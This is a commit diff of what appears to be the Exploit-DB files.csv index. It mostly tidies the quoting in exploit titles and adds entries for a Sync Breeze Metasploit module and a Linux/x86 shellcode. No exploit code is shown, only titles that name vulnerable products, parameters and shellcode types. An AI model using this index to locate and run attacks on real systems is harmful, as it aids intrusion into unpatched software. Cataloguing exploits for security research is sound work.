DB: 2017-10-14

11 new exploits FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups mIRC 6.1 - DCC SEND Buffer Overflow (1) mIRC 6.1 - DCC SEND Buffer Overflow (2) mIRC 6.1 - 'DCC SEND' Buffer Overflow (1) mIRC 6.1 - 'DCC SEND' Buffer Overflow (2) Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution Oracle Solaris - 'su' Local Solaris Oracle Solaris - 'su' Local Exploit Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2) Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2) Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes) phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP) cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP) WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting Accelerated Mortgage Manager - Password Field SQL Injection YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting Accelerated Mortgage Manager - 'Password' SQL Injection YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion Xoops 2.2.3 - search.php Cross-Site Scripting Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion Xoops 2.2.3 - 'search.php' Cross-Site Scripting Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection TYPO3 ke DomPDF Extension - Remote Code Execution TYPO3 Extension ke DomPDF - Remote Code Execution TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection TYPO3 News Module - SQL Injection TYPO3 Extension News - SQL Injection OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting E-Sic Software livre CMS - 'q' Parameter SQL Injection E-Sic Software livre CMS - Autentication Bypass E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection E-Sic Software livre CMS - 'f' Parameter SQL Injection E-Sic Software livre CMS - Cross Site Scripting TYPO3 Extension Restler 1.7.0 - Local File Disclosure Dreambox Plugin BouquetEditor - Cross-Site Scripting phpMyFAQ 2.9.8 - Cross-Site Scripting
2017-10-14 05:01:31 +00:00 · 2017-10-14 05:01:31 +00:00 · 51c5257c7f
commit 51c5257c7f
parent a32f88c4ef
13 changed files with 436 additions and 27 deletions
--- a/files.csv
+++ b/files.csv
@ -395,8 +395,8 @@ id,file,description,date,author,platform,type,port
 2515,platforms/multiple/dos/2515.txt,"Kmail 1.9.1 - (IMG SRC) Remote Denial of Service",2006-10-11,nnp,multiple,dos,0
 2523,platforms/windows/dos/2523.pl,"Microsoft Office 2003 - '.PPT' Local Buffer Overflow (PoC)",2006-10-12,Nanika,windows,dos,0
 2524,platforms/bsd/dos/2524.c,"FreeBSD 5.4/6.0 - 'ptrace PT_LWPINFO' Local Denial of Service",2006-10-12,kokanin,bsd,dos,0
-2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - (ftruncate) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
-2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - (scheduler) Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
+2541,platforms/bsd/dos/2541.c,"FreeBSD 6.1-RELEASE-p10 - 'ftruncate' Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
+2542,platforms/bsd/dos/2542.c,"FreeBSD 6.1-RELEASE-p10 - 'scheduler' Local Denial of Service",2006-10-13,kokanin,bsd,dos,0
 2571,platforms/windows/dos/2571.pl,"Xfire 1.6.4 - Remote Denial of Service (Perl)",2006-10-16,n00b,windows,dos,0
 2586,platforms/multiple/dos/2586.pl,"Clam AntiVirus 0.88.4 - CHM Chunk Name Length Denial of Service (PoC)",2006-10-17,"Damian Put",multiple,dos,0
 2587,platforms/multiple/dos/2587.txt,"Clam AntiVirus 0.88.4 - 'rebuildpe' Remote Heap Overflow (PoC)",2006-10-17,"Damian Put",multiple,dos,0
@ -1745,7 +1745,7 @@ id,file,description,date,author,platform,type,port
 15215,platforms/multiple/dos/15215.txt,"libc/glob(3) - Resource Exhaustion / Remote ftpd-anonymous (Denial of Service)",2010-10-07,"Maksymilian Arciemowicz",multiple,dos,0
 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 - '.m3u8' Buffer Overflow",2010-11-23,anT!-Tr0J4n,windows,dos,0
 15229,platforms/windows/dos/15229.pl,"FoxPlayer 2.3.0 - '.m3u' Buffer Overflow",2010-10-10,"Anastasios Monachos",windows,dos,0
-15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - WMP Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0
+15242,platforms/windows/dos/15242.html,"Mozilla Firefox 3.5.10/3.6.6 - 'WMP' Memory Corruption Using Popups",2010-10-13,Skylined,windows,dos,0
 15243,platforms/windows/dos/15243.html,"Oracle Java - APPLET Tag Children Property Memory Corruption",2010-10-13,Skylined,windows,dos,0
 15248,platforms/windows/dos/15248.txt,"Winamp 5.5.8.2985 - Multiple Buffer Overflows",2010-10-13,"Luigi Auriemma",windows,dos,0
 15250,platforms/windows/dos/15250.py,"Ease Jukebox 1.30 - Denial of Service",2010-10-14,Sweet,windows,dos,0
@ -2997,8 +2997,8 @@ id,file,description,date,author,platform,type,port
 23235,platforms/windows/dos/23235.txt,"OpenOffice 1.0.1 - Remote Access Denial of Service",2003-10-08,"Marc Schoenefeld",windows,dos,0
 23236,platforms/hp-ux/dos/23236.txt,"HP-UX 11 CDE DTPrintInfo - Display Environment Variable Buffer Overflow",2003-10-08,"Davide Del Vecchio",hp-ux,dos,0
 23239,platforms/linux/dos/23239.c,"IRCnet IRCD 2.10 - Local Buffer Overflow",2003-10-13,millhouse,linux,dos,0
-23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
-23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - DCC SEND Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
+23240,platforms/windows/dos/23240.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (1)",2003-10-13,"Takara Takaishi",windows,dos,0
+23241,platforms/windows/dos/23241.pl,"mIRC 6.1 - 'DCC SEND' Buffer Overflow (2)",2003-10-13,DarkAngel,windows,dos,0
 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21 - long Message Remote Denial of Service",2003-10-14,storm@securiteam.com,windows,dos,0
 23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service",2003-10-15,"Oliver Karow",linux,dos,0
 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 - Integer Overflow",2012-12-09,beford,windows,dos,0
@ -4217,7 +4217,7 @@ id,file,description,date,author,platform,type,port
 33269,platforms/linux/dos/33269.txt,"Dopewars Server 1.5.12 - 'REQUESTJET' Message Remote Denial of Service",2009-10-15,"Doug Prostko",linux,dos,0
 33271,platforms/windows/dos/33271.py,"VMware Player / VMware Workstation 6.5.3 - 'VMware-authd' Remote Denial of Service",2009-10-07,shinnai,windows,dos,0
 33280,platforms/hardware/dos/33280.txt,"Palm WebOS 1.0/1.1 - 'LunaSysMgr' Service Denial of Service",2009-10-13,"Townsend Ladd Harris",hardware,dos,0
-33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 and Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0
+33283,platforms/linux/dos/33283.txt,"Adobe Reader 9.1.3 / Acrobat - COM Objects Memory Corruption Remote Code Execution",2009-10-13,Skylined,linux,dos,0
 33289,platforms/linux/dos/33289.txt,"Linux Kernel 2.6.x - '/drivers/net/r8169.c' Out-of-IOMMU Error Local Denial of Service",2009-08-28,"Alistair Strachan",linux,dos,0
 33306,platforms/linux/dos/33306.txt,"Snort 2.8.5 - Multiple Denial of Service Vulnerabilities",2009-10-22,"laurent gaffie",linux,dos,0
 33312,platforms/linux/dos/33312.txt,"Mozilla Firefox 3.5.3 - Floating Point Conversion Heap Overflow",2009-10-27,"Alin Rad Pop",linux,dos,0
@ -6959,7 +6959,7 @@ id,file,description,date,author,platform,type,port
 15206,platforms/bsd/local/15206.c,"FreeBSD - 'pseudofs' Null Pointer Dereference Privilege Escalation",2010-10-04,"Babcia Padlina",bsd,local,0
 15285,platforms/linux/local/15285.c,"Linux Kernel 2.6.36-rc8 - 'RDS Protocol' Privilege Escalation",2010-10-19,"Dan Rosenberg",linux,local,0
 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - '.m3u' Buffer Overflow",2010-11-23,0v3r,windows,local,0
-15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Solaris",2010-10-13,prdelka,solaris,local,0
+15245,platforms/solaris/local/15245.txt,"Oracle Solaris - 'su' Local Exploit",2010-10-13,prdelka,solaris,local,0
 15609,platforms/windows/local/15609.txt,"Microsoft Windows Vista/7 - Privilege Escalation (UAC Bypass)",2010-11-24,noobpwnftw,windows,local,0
 15274,platforms/linux/local/15274.txt,"GNU C library dynamic linker - '$ORIGIN' Expansion",2010-10-18,"Tavis Ormandy",linux,local,0
 15279,platforms/windows/local/15279.rb,"Fat Player 0.6b - '.wav' Buffer Overflow (SEH)",2010-10-18,"James Fitts",windows,local,0
@ -11676,7 +11676,7 @@ id,file,description,date,author,platform,type,port
 17960,platforms/windows/remote/17960.rb,"Opera Browser 10/11/12 - 'SVG Layout' Memory Corruption (Metasploit)",2011-10-10,"Jose A. Vazquez",windows,remote,0
 17974,platforms/windows/remote/17974.html,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (1)",2011-10-12,ryujin,windows,remote,0
 17975,platforms/windows/remote/17975.rb,"PcVue 10.0 SV.UIGrdCtrl.1 - 'LoadObject()/SaveObject()' Trusted DWORD (Metasploit)",2011-10-12,Metasploit,windows,remote,0
-17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - Array.reduceRight() Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
+17976,platforms/windows/remote/17976.rb,"Mozilla Firefox - 'Array.reduceRight()' Integer Overflow (Metasploit) (2)",2011-10-13,Metasploit,windows,remote,0
 17977,platforms/windows/remote/17977.txt,"JBoss AS 2.0 - Remote Exploit",2011-10-11,kingcope,windows,remote,0
 17986,platforms/osx/remote/17986.rb,"Apple Safari - 'file://' Arbitrary Code Execution (Metasploit)",2011-10-17,Metasploit,osx,remote,0
 17993,platforms/windows/remote/17993.rb,"Apple Safari Webkit - libxslt Arbitrary File Creation (Metasploit)",2011-10-18,Metasploit,windows,remote,0
@ -15901,6 +15901,7 @@ id,file,description,date,author,platform,type,port
 42964,platforms/lin_x86-64/remote/42964.rb,"Rancher Server - Docker Daemon Code Execution (Metasploit)",2017-10-09,Metasploit,lin_x86-64,remote,8080
 42965,platforms/multiple/remote/42965.rb,"OrientDB 2.2.2 < 2.2.22 - Remote Code Execution (Metasploit)",2017-10-09,Metasploit,multiple,remote,2480
 42973,platforms/windows/remote/42973.py,"VX Search Enterprise 10.1.12 - Buffer Overflow",2017-10-09,"Revnic Vasile",windows,remote,0
+42984,platforms/windows/remote/42984.rb,"Sync Breeze Enterprise 10.1.16 - Buffer Overflow (SEH) (Metasploit)",2017-10-13,wetw0rk,windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -16550,6 +16551,7 @@ id,file,description,date,author,platform,type,port
 42646,platforms/arm/shellcode/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 42647,platforms/arm/shellcode/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",arm,shellcode,0
 42791,platforms/lin_x86-64/shellcode/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",lin_x86-64,shellcode,0
+42977,platforms/lin_x86/shellcode/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",lin_x86,shellcode,0
 6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
 44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
 47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
@ -17517,13 +17519,13 @@ id,file,description,date,author,platform,type,port
 2545,platforms/php/webapps/2545.pl,"phpBB News Defilante Horizontale 4.1.1 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2546,platforms/php/webapps/2546.pl,"phpBB lat2cyr Mod 1.0.1 - 'lat2cyr.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2547,platforms/php/webapps/2547.pl,"phpBB SpamOborona Mod 1.0b - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
-2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - functions_rpg_events Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
+2548,platforms/php/webapps/2548.pl,"phpBB RPG Events 1.0 - 'functions_rpg_events' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2549,platforms/php/webapps/2549.pl,"phpBB SearchIndexer Mod - 'archive_topic.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2550,platforms/php/webapps/2550.pl,"phpBB Prillian French Mod 0.8.0 - Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2551,platforms/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,php,webapps,0
 2552,platforms/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 2553,platforms/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,php,webapps,0
-2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - (cpwrap via MySQLAdmin) Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
+2554,platforms/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",php,webapps,0
 2555,platforms/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,php,webapps,0
 2556,platforms/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,php,webapps,0
 2557,platforms/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,php,webapps,0
@ -18759,7 +18761,7 @@ id,file,description,date,author,platform,type,port
 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 - 'tiki-graph_formula.php' Command Execution",2007-10-12,str0ke,php,webapps,0
 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script - SQL Injection",2007-10-13,"Khashayar Fereidani",php,webapps,0
 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module - SQL Injection",2007-10-13,"Mehmet Ince",php,webapps,0
-4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - (IsisScript) Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps,0
+4529,platforms/cgi/webapps/4529.txt,"WWWISIS 7.1 - 'IsisScript' Local File Disclosure / Cross-Site Scripting",2007-10-13,JosS,cgi,webapps,0
 4536,platforms/php/webapps/4536.txt,"doop CMS 1.3.7 - Local File Inclusion",2007-10-15,vladii,php,webapps,0
 4538,platforms/php/webapps/4538.txt,"Artmedic CMS 3.4 - 'index.php' Local File Inclusion",2007-10-16,iNs,php,webapps,0
 4539,platforms/php/webapps/4539.txt,"Okul Otomasyon Portal 2.0 - SQL Injection",2007-10-16,dumenci,php,webapps,0
@ -27834,7 +27836,7 @@ id,file,description,date,author,platform,type,port
 24673,platforms/asp/webapps/24673.txt,"DUforum 3.x - Login Form Password Parameter SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
 24674,platforms/asp/webapps/24674.txt,"DUforum 3.x - 'messages.asp FOR_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
 24675,platforms/asp/webapps/24675.txt,"DUforum 3.x - 'messageDetail.asp MSG_ID' SQL Injection",2004-10-11,"Soroosh Dalili",asp,webapps,0
-24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - Render.UserLayoutRootNode.uP Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
+24676,platforms/php/webapps/24676.txt,"SCT Campus Pipeline 1.0/2.x/3.x - 'Render.UserLayoutRootNode.uP' Cross-Site Scripting",2004-10-13,"Matthew Oyer",php,webapps,0
 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0
 24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 - SettingsBase.php Cross-Site Scripting",2004-10-14,"Secunia Research",php,webapps,0
 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0
@ -28931,8 +28933,8 @@ id,file,description,date,author,platform,type,port
 26339,platforms/php/webapps/26339.txt,"Cyphor 0.19 - 'footer.php t_login' Parameter Cross-Site Scripting",2005-10-08,retrogod@aliceposta.it,php,webapps,0
 26343,platforms/php/webapps/26343.txt,"Accelerated E Solutions - SQL Injection",2005-10-11,"Andysheh Soltani",php,webapps,0
 26344,platforms/cgi/webapps/26344.txt,"WebGUI 6.x - Arbitrary Command Execution",2005-10-12,"David Maciejak",cgi,webapps,0
-26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - view.php img_size Parameter Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0
-26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - Password Field SQL Injection",2005-10-13,imready4chillin,php,webapps,0
+26345,platforms/php/webapps/26345.txt,"YaPiG 0.95b - 'view.php?img_size' Cross-Site Scripting",2005-10-13,enji@infosys.tuwien.ac.at,php,webapps,0
+26346,platforms/php/webapps/26346.txt,"Accelerated Mortgage Manager - 'Password' SQL Injection",2005-10-13,imready4chillin,php,webapps,0
 26347,platforms/php/webapps/26347.txt,"Gallery 2.0 - main.php Directory Traversal",2005-10-14,"Michael Dipper",php,webapps,0
 26348,platforms/php/webapps/26348.txt,"Complete PHP Counter - SQL Injection",2005-10-14,BiPi_HaCk,php,webapps,0
 26349,platforms/php/webapps/26349.txt,"Complete PHP - Counter Cross-Site Scripting",2005-10-14,BiPi_HaCk,php,webapps,0
@ -30466,7 +30468,7 @@ id,file,description,date,author,platform,type,port
 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail - Getad.php Cross-Site Scripting",2006-08-21,night_warrior771,php,webapps,0
 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 - 'index.php' Remote File Inclusion",2006-08-22,Root3r_H3ll,php,webapps,0
 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 - HPEInc Parameter Multiple Remote File Inclusion",2006-08-21,"the master",php,webapps,0
-28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - Thanks_comment.php Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0
+28428,platforms/php/webapps/28428.txt,"YaPiG 0.9x - 'Thanks_comment.php' Cross-Site Scripting",2006-10-13,Kuon,php,webapps,0
 28429,platforms/php/webapps/28429.js,"MyBB 1.1.7 - Multiple HTML Injection Vulnerabilities",2006-08-26,Redworm,php,webapps,0
 28430,platforms/php/webapps/28430.txt,"Jupiter CMS 1.1.5 - 'index.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
 28431,platforms/php/webapps/28431.txt,"Jetbox CMS 2.1 - 'Search_function.php' Remote File Inclusion",2006-08-26,D3nGeR,php,webapps,0
@ -30758,13 +30760,13 @@ id,file,description,date,author,platform,type,port
 28794,platforms/php/webapps/28794.txt,"4Images 1.7 - 'details.php' Cross-Site Scripting",2006-10-12,"Christian Marthen",php,webapps,0
 28795,platforms/php/webapps/28795.php,"FreeWPS 2.11 - 'upload.php' Remote Command Execution",2006-10-12,"HACKERS PAL",php,webapps,0
 28796,platforms/php/webapps/28796.pl,"Buzlas 2006-1 Full - 'Archive_Topic.php' Remote File Inclusion",2006-09-29,"Nima Salehi",php,webapps,0
-28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php' page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - admin.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - rss.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - rss2.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - rdf.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - files/mainfile.php page[path] Parameter Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
-28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - search.php Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0
+28797,platforms/php/webapps/28797.txt,"Bloq 0.5.4 - 'index.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28798,platforms/php/webapps/28798.txt,"Bloq 0.5.4 - 'admin.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28799,platforms/php/webapps/28799.txt,"Bloq 0.5.4 - 'rss.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28800,platforms/php/webapps/28800.txt,"Bloq 0.5.4 - 'rss2.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28801,platforms/php/webapps/28801.txt,"Bloq 0.5.4 - 'rdf.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28802,platforms/php/webapps/28802.txt,"Bloq 0.5.4 - 'files/mainfile.php?page[path]' Remote File Inclusion",2006-10-13,KorsaN,php,webapps,0
+28803,platforms/php/webapps/28803.txt,"Xoops 2.2.3 - 'search.php' Cross-Site Scripting",2006-10-13,b0rizQ,php,webapps,0
 28804,platforms/php/webapps/28804.pl,"phpBB Add Name Module - 'Not_Mem.php' Remote File Inclusion",2006-10-13,"Nima Salehi",php,webapps,0
 28807,platforms/php/webapps/28807.py,"WHMCompleteSolution (WHMCS) 5.2.7 - SQL Injection",2013-10-08,localhost.re,php,webapps,0
 28808,platforms/php/webapps/28808.txt,"WordPress Plugin Quick Contact Form 6.0 - Persistent Cross-Site Scripting",2013-10-08,Zy0d0x,php,webapps,0
@ -34471,7 +34473,7 @@ id,file,description,date,author,platform,type,port
 34781,platforms/php/webapps/34781.txt,"WordPress Plugin All In One WP Security 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
 34798,platforms/php/webapps/34798.txt,"ITS SCADA - 'Username' SQL Injection",2010-10-04,"Eugene Salov",php,webapps,0
 34816,platforms/ios/webapps/34816.txt,"GS Foto Uebertraeger 3.0 iOS - Local File Inclusion",2014-09-29,Vulnerability-Lab,ios,webapps,0
-34800,platforms/php/webapps/34800.txt,"Typo3 JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
+34800,platforms/php/webapps/34800.txt,"Typo3 Extension JobControl 2.14.0 - Cross-Site Scripting / SQL Injection",2014-09-27,"Adler Freiheit",php,webapps,0
 34809,platforms/php/webapps/34809.txt,"Tausch Ticket Script 3 - suchauftraege_user.php userid Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34810,platforms/php/webapps/34810.txt,"Tausch Ticket Script 3 - vote.php descr Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
 34811,platforms/php/webapps/34811.txt,"Linea21 1.2.1 - 'search' Parameter Cross-Site Scripting",2009-07-08,"599eme Man",php,webapps,0
@ -34855,7 +34857,7 @@ id,file,description,date,author,platform,type,port
 35438,platforms/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",cgi,webapps,0
 35439,platforms/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80
 35442,platforms/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps,0
-35443,platforms/php/webapps/35443.txt,"TYPO3 ke DomPDF Extension - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
+35443,platforms/php/webapps/35443.txt,"TYPO3 Extension ke DomPDF - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80
 35444,platforms/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps,0
 35447,platforms/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps,0
 35451,platforms/php/webapps/35451.txt,"BoutikOne - categorie.php path Parameter SQL Injection",2011-03-14,cdx.security,php,webapps,0
@ -36035,7 +36037,7 @@ id,file,description,date,author,platform,type,port
 37250,platforms/xml/webapps/37250.txt,"HP WebInspect 10.4 - XML External Entity Injection",2015-06-10,"Jakub Palaczynski",xml,webapps,0
 39479,platforms/ios/webapps/39479.txt,"InstantCoder 1.0 iOS - Multiple Vulnerabilities",2016-02-22,Vulnerability-Lab,ios,webapps,0
 37298,platforms/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",hardware,webapps,80
-37301,platforms/php/webapps/37301.txt,"TYPO3 Akronymmanager Extension 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
+37301,platforms/php/webapps/37301.txt,"TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection",2015-06-16,"RedTeam Pentesting",php,webapps,80
 37302,platforms/php/webapps/37302.txt,"E-Detective Lawful Interception System - Multiple Vulnerabilities",2015-06-16,"Mustafa Al-Bassam",php,webapps,0
 37304,platforms/php/webapps/37304.txt,"BlackCat CMS 1.1.1 - Arbitrary File Download",2015-06-17,d4rkr0id,php,webapps,80
